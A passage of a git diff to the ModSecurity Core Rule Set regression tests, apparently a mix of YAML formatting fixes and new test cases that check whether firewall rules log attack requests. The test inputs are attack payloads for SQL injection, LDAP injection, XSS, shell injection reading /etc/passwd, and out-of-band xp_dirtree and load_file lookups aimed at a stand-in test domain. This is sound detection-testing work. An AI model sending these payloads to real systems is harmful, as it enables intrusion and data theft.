User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\"" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\"" data: "test=value" output: no_log_contains: "id \"920480\"" @@ -216,7 +218,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded; charset='utf-8'" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded; charset='utf-8'" data: "test=value" output: no_log_contains: "id \"920480\"" @@ -230,7 +233,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\"" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\"" data: "test=value" output: log_contains: "id \"920480\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml new file mode 100644 index 000000000..9adf2dfa8 --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml @@ -0,0 +1,97 @@ +--- + meta: + author: "Andrea Menin" + enabled: true + name: "920510.yaml" + description: "Cache-Control directives whitelist" + tests: + - test_title: 920510-1 + desc: "block request with a response cache-control directive in request" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "private" + output: + log_contains: "id \"920510\"" + - test_title: 920510-2 + desc: "block request with an invalid cache-control directive in request" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "foo=bar" + output: + log_contains: "id \"920510\"" + - test_title: 920510-3 + desc: "block request with an invalid cache-control directive in request with multiple directives" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "max-age=1, foo=bar" + output: + log_contains: "id \"920510\"" + - test_title: 920510-4 + desc: "block request with an invalid cache-control syntax in request with multiple directives" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "max-age=1,,,max-stale=2" + output: + log_contains: "id \"920510\"" + - test_title: 920510-5 + desc: "allow request with valid cache-control single directive" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "no-cache" + output: + no_log_contains: "id \"920510\"" + - test_title: 920510-6 + desc: "allow request with valid cache-control multiple directive" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "max-age=123, max-stale, no-cache" + output: + no_log_contains: "id \"920510\"" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 0667f0766..eb456983e 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,6 +1,6 @@ --- meta: - author: csanders-git + author: "csanders-git, Franziska Bühler" description: None enabled: true name: 921130.yaml @@ -47,3 +47,37 @@ uri: "/" output: log_contains: id "921130" + - + test_title: 921130-3 + desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 + stages: + - + stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "*/*" + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2 + output: + log_contains: id "921130" + - + test_title: 921130-4 + desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 + stages: + - + stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "*/*" + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2 + output: + log_contains: id "921130" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 80094eab0..534e2b4ea 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml @@ -63,7 +63,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=bar)(%26)" uri: "/" @@ -80,7 +79,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=printer)(uid=*)" uri: "/" @@ -97,7 +95,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=void)(objectClass=users))(%26(objectClass=void)" uri: "/" @@ -114,7 +111,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=eb9adbd87d)!(sn=*" uri: "/" @@ -131,7 +127,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=*)!(sn=*" uri: "/" @@ -148,7 +143,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=*)(uid=*))(|(uid=*" uri: "/" @@ -165,7 +159,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=aaa*aaa)(cn>=bob)" uri: "/" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 2e07450b7..a094ff92f 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,3 +1,4 @@ +--- meta: author: studersi description: None diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index 1404e1c44..b63bf7216 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -89,5 +89,3 @@ uri: /?x=$_%53%20ERVER['request_uri']; output: no_log_contains: id "933130" - - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index dfd59302c..14a69c0f7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -84,4 +84,3 @@ uri: /?foo=array_diff output: no_log_contains: id "933151" - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 5bd638263..7e71b9a91 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -629,4 +629,3 @@ uri: /?foo=system%20something%28%29 output: log_contains: id "933160" - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 810ae43f2..b4091e3c2 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -161,4 +161,3 @@ uri: /serialize9 output: log_contains: id "933170" - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 0a6e0c718..2cb88d929 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -527,4 +527,4 @@ port: 80 uri: /?x=Foo%3A%3A%24variable%28%29 output: - log_contains: id "933180" \ No newline at end of file + log_contains: id "933180" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml index aed994235..f44ee94a9 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml @@ -148,4 +148,4 @@ uri: /?foo=XyQkTkRfRlVOQyQkXwo= version: HTTP/1.0 output: - log_contains: id "934100" \ No newline at end of file + log_contains: id "934100" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 0baf856b5..b93f1f131 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml @@ -37,7 +37,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" + data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" version: HTTP/1.0 output: log_contains: id "941130" @@ -56,7 +56,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=aai" + data: "var=aai" version: HTTP/1.0 output: log_contains: id "941130" @@ -75,7 +75,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=abcd'||(select extractvalue(xmltype('%cgger;" + data: "var=abcd'||(select extractvalue(xmltype('%cgger;" version: HTTP/1.0 output: log_contains: id "941130" @@ -94,7 +94,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=" + data: "var=" version: HTTP/1.0 output: log_contains: id "941130" @@ -113,7 +113,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" + data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" version: HTTP/1.0 output: log_contains: id "941130" @@ -132,7 +132,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=afa" + data: "var=afa" version: HTTP/1.0 output: log_contains: id "941130" @@ -151,7 +151,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=chj" + data: "var=chj" version: HTTP/1.0 output: log_contains: id "941130" @@ -170,7 +170,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" + data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" version: HTTP/1.0 output: log_contains: id "941130" @@ -189,7 +189,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" + data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" version: HTTP/1.0 output: log_contains: id "941130" @@ -208,7 +208,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" + data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" version: HTTP/1.0 output: log_contains: id "941130" @@ -227,7 +227,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=Matched Data: %awfke;" + data: "var=Matched Data: %awfke;" version: HTTP/1.0 output: log_contains: id "941130" @@ -246,7 +246,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=oez" + data: "var=oez" version: HTTP/1.0 output: log_contains: id "941130" @@ -265,7 +265,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=(select extractvalue(xmltype('%anwyn;" + data: "var=(select extractvalue(xmltype('%anwyn;" version: HTTP/1.0 output: log_contains: id "941130" @@ -284,7 +284,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=" + data: "var=" version: HTTP/1.0 output: log_contains: id "941130" @@ -303,7 +303,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" + data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" version: HTTP/1.0 output: log_contains: id "941130" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 6f154ba45..7ba9d6539 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -7,7 +7,7 @@ tests: - test_title: 941350-1 - desc: GH issue #1514 + desc: GH issue 1514 stages: - stage: diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index b3f3384ad..6da8602f9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -20,7 +20,7 @@ method: GET port: 80 uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' - # /login?user={{constructor.constructor('alert(1)')()}} + # /login?user={{constructor.constructor('alert(1)')()}} version: HTTP/1.1 output: log_contains: id "941380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 8d47aec9e..7e8337545 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -18,7 +18,7 @@ method: POST port: 80 uri: "/" - data : "var=1234 OR 1=1" + data: "var=1234 OR 1=1" version: HTTP/1.0 output: log_contains: id "942100" @@ -35,7 +35,7 @@ method: POST port: 80 uri: "/" - data : "var=-1839' or '1'='1" + data: "var=-1839' or '1'='1" version: HTTP/1.0 output: log_contains: id "942100" @@ -52,7 +52,7 @@ method: POST port: 80 uri: "/" - data : "var=-1839\x22 or \x221\x22=\x222" + data: "var=-1839\x22 or \x221\x22=\x222" version: HTTP/1.0 output: log_contains: id "942100" @@ -69,7 +69,7 @@ method: POST port: 80 uri: "/" - data : "var=2010-01-01'+sleep(20.to_i)+'" + data: "var=2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: log_contains: id "942100" @@ -86,7 +86,7 @@ method: POST port: 80 uri: "/" - data : "var=EmptyValue' and 526=527" + data: "var=EmptyValue' and 526=527" version: HTTP/1.0 output: log_contains: id "942100" @@ -103,7 +103,7 @@ method: POST port: 80 uri: "/" - data : "var=foo') UNION ALL select NULL --" + data: "var=foo') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" @@ -120,7 +120,7 @@ method: POST port: 80 uri: "/" - data : "var=foo')waitfor%20delay'5%3a0%3a20'--" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: log_contains: id "942100" @@ -137,7 +137,7 @@ method: POST port: 80 uri: "/" - data : "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" version: HTTP/1.0 output: log_contains: id "942100" @@ -154,7 +154,7 @@ method: POST port: 80 uri: "/" - data : "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" @@ -171,7 +171,7 @@ method: POST port: 80 uri: "/" - data : "1'||(select extractvalue(xmltype('%toyop;" + data: "1'||(select extractvalue(xmltype('%toyop;" version: HTTP/1.0 output: log_contains: id "942100" @@ -188,7 +188,7 @@ method: POST port: 80 uri: "/" - data : "var=sleep(20)" + data: "var=sleep(20)" version: HTTP/1.0 output: log_contains: id "942100" @@ -205,7 +205,7 @@ method: POST port: 80 uri: "/" - data : "var=unittests@coreruleset.org\x22 sleep(10.to_i) \x22" + data: "var=unittests@coreruleset.org\x22 sleep(10.to_i) \x22" version: HTTP/1.0 output: log_contains: id "942100" @@ -222,7 +222,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22 | type %SystemDrive%\x5c\x5cconfig.ini | \x22" + data: "var=\x22 | type %SystemDrive%\x5c\x5cconfig.ini | \x22" version: HTTP/1.0 output: log_contains: id "942100" @@ -239,7 +239,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22unittests@coreruleset.org\x22'))\x20and (select*from(select(sleep(5)))x) --" + data: "var=\x22unittests@coreruleset.org\x22'))\x20and (select*from(select(sleep(5)))x) --" version: HTTP/1.0 output: log_contains: id "942100" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 552f9c2f6..4c0722461 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -340,7 +340,7 @@ method: POST port: 80 uri: "/" - data: "pay= in ( Aa,- Ab-, andd Ac)" + data: "pay= in ( Aa,- Ab-, and Ac)" version: HTTP/1.0 output: log_contains: id "942120" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index bf4e761f6..25c3e1069 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -18,7 +18,7 @@ method: POST port: 80 uri: "/" - data : "var=SKLJDRTZWS89E450W49NQB0W45BN\x22=sleep(12)=\x22" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\x22=sleep(12)=\x22" version: HTTP/1.0 output: log_contains: id "942150" @@ -35,7 +35,7 @@ method: POST port: 80 uri: "/" - data : "var=1' and sleep(9) #" + data: "var=1' and sleep(9) #" version: HTTP/1.0 output: log_contains: id "942150" @@ -52,7 +52,7 @@ method: POST port: 80 uri: "/" - data : "var=1(select*from(select(sleep(5)))d)" + data: "var=1(select*from(select(sleep(5)))d)" version: HTTP/1.0 output: log_contains: id "942150" @@ -69,7 +69,7 @@ method: POST port: 80 uri: "/" - data : "var=unittests@coreruleset.org' (function(){if(typeof foo===\x22undefined\x22){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\x22undefined\x22){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" version: HTTP/1.0 output: log_contains: id "942150" @@ -85,7 +85,7 @@ method: POST port: 80 uri: "/" - data : "var=test')and (select*from(select(sleep(10)))d)--" + data: "var=test')and (select*from(select(sleep(10)))d)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -102,7 +102,7 @@ method: POST port: 80 uri: "/" - data : "var=foo'||(select extractvalue(xmltype('%tocob;" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" version: HTTP/1.0 output: log_contains: id "942150" @@ -119,7 +119,7 @@ method: POST port: 80 uri: "/" - data : "var=config.ini' and sleep(91) #" + data: "var=config.ini' and sleep(91) #" version: HTTP/1.0 output: log_contains: id "942150" @@ -136,7 +136,7 @@ method: POST port: 80 uri: "/" - data : "var=/config.txt' (select load_file('\x5c\x5c\x5c\x5cunittests.coreruleset.org\x5c\x5czow')) '" + data: "var=/config.txt' (select load_file('\x5c\x5c\x5c\x5cunittests.coreruleset.org\x5c\x5czow')) '" version: HTTP/1.0 output: log_contains: id "942150" @@ -153,7 +153,7 @@ method: POST port: 80 uri: "/" - data : "var=None')and (select*from(select(sleep(10)))a)--" + data: "var=None')and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -170,7 +170,7 @@ method: POST port: 80 uri: "/" - data : "var=eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))" + data: "var=eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))" version: HTTP/1.0 output: log_contains: id "942150" @@ -187,7 +187,7 @@ method: POST port: 80 uri: "/" - data : "var=file:/init.ini'.sleep(12).'" + data: "var=file:/init.ini'.sleep(12).'" version: HTTP/1.0 output: log_contains: id "942150" @@ -204,7 +204,7 @@ method: POST port: 80 uri: "/" - data : "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -221,7 +221,7 @@ method: POST port: 80 uri: "/" - data : "var=(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cunitests.corerule'||'set.org\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5chvs'))" + data: "var=(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cunitests.corerule'||'set.org\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5chvs'))" version: HTTP/1.0 output: log_contains: id "942150" @@ -238,7 +238,7 @@ method: POST port: 80 uri: "/" - data : "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" @@ -255,7 +255,7 @@ method: POST port: 80 uri: "/" - data : "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" version: HTTP/1.0 output: log_contains: id "942150" @@ -272,7 +272,7 @@ method: POST port: 80 uri: "/" - data : "var=test{${sleep(12)}}" + data: "var=test{${sleep(12)}}" version: HTTP/1.0 output: log_contains: id "942150" @@ -289,7 +289,7 @@ method: POST port: 80 uri: "/" - data : "var=test\x22+eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))+\x22" + data: "var=test\x22+eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))+\x22" version: HTTP/1.0 output: log_contains: id "942150" @@ -306,7 +306,7 @@ method: POST port: 80 uri: "/" - data : "var=test\x22+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\x22" + data: "var=test\x22+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\x22" version: HTTP/1.0 output: log_contains: id "942150" @@ -323,7 +323,7 @@ method: POST port: 80 uri: "/" - data : "var=\x5cfoobar.txt\x22 or sleep(4) #" + data: "var=\x5cfoobar.txt\x22 or sleep(4) #" version: HTTP/1.0 output: log_contains: id "942150" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index 32b1e10b5..0ccec158a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -36,6 +36,6 @@ port: 80 uri: "/" version: HTTP/1.0 - data : "javascript:\"/*'/*`/*-->%ptkjp;" + data: "var=abcd'||(select extractvalue(xmltype('%ptkjp;" version: HTTP/1.0 output: log_contains: id "942260" @@ -120,7 +120,7 @@ method: POST port: 80 uri: "/" - data : "var=` /bin/cat /etc/passwd`" + data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.0 output: log_contains: id "942260" @@ -137,7 +137,7 @@ method: POST port: 80 uri: "/" - data : "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" version: HTTP/1.0 output: log_contains: id "942260" @@ -154,7 +154,7 @@ method: POST port: 80 uri: "/" - data : "var=`echo crs312``echo 34test`" + data: "var=`echo crs312``echo 34test`" version: HTTP/1.0 output: log_contains: id "942260" @@ -171,7 +171,7 @@ method: POST port: 80 uri: "/" - data : "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" + data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" version: HTTP/1.0 output: log_contains: id "942260" @@ -188,7 +188,7 @@ method: POST port: 80 uri: "/" - data : "var=1);declare @q varchar(99);set @q='\x5c\x5cj0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\x5ckph'; exec master.dbo.xp_dirtree @q;--" + data: "var=1);declare @q varchar(99);set @q='\x5c\x5cj0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\x5ckph'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" @@ -205,7 +205,7 @@ method: POST port: 80 uri: "/" - data : "var=content.ini);declare @q varchar(99);set @q='\x5c\x5ci1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\x5clri'; exec master.dbo.xp_dirtree @q;--" + data: "var=content.ini);declare @q varchar(99);set @q='\x5c\x5ci1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\x5clri'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" @@ -222,7 +222,7 @@ method: POST port: 80 uri: "/" - data : "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\x5c\x5ch5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\x5cvcr'; exec master.dbo.xp_dirtree @q;--" + data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\x5c\x5ch5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\x5cvcr'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" @@ -239,7 +239,7 @@ method: POST port: 80 uri: "/" - data : "var=test));declare @q varchar(99);set @q='\x5c\x5czwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\x5cgej'; exec master.dbo.xp_dirtree @q;--" + data: "var=test));declare @q varchar(99);set @q='\x5c\x5czwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\x5cgej'; exec master.dbo.xp_dirtree @q;--" version: 